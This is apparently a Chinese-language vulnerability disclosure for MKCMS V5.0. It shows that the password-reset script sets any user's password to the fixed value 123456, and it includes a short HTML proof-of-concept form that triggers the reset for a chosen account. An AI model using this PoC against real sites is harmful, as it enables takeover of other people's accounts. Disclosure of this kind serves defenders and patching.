MKCMS V5.0存在逻辑漏洞


一、漏洞摘要

漏洞名称: MKCMS V5.0存在逻辑漏洞
上报日期: 2019-04-18
漏洞发现者: topsec_lizhongcheng
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0

二、漏洞概述


      1.找回密码的处理逻辑存在漏洞,导致可以接管任意账号 : ucenter/ repass.php
        $username 通过post请求过来,接着查询数据库是否存在对应的记录;md5加密后(123456)直接插入数据库,最后通过邮件发送给对应的邮箱账号。所以这里重置后,密码    是可知道的,导致可以接管对应账号





三、利用代

      1.构造如下poc.html,并访问poc.html,然后用123456密码登录即可


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://v.micool.top/ucenter/repass.php" method="POST">
      <input type="hidden" name="u&#95;name" value="lduo123" />
      <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />
      <input type="submit" value="Submit request" />
    </form>                         
  </body>
</html>
     
   

评论

此博客中的热门博文

Gila CMS 1.10.1 任意文件下载漏洞

Gila CMS 1.10.1 CSRF 漏洞

OTCMS 反射型XSS漏洞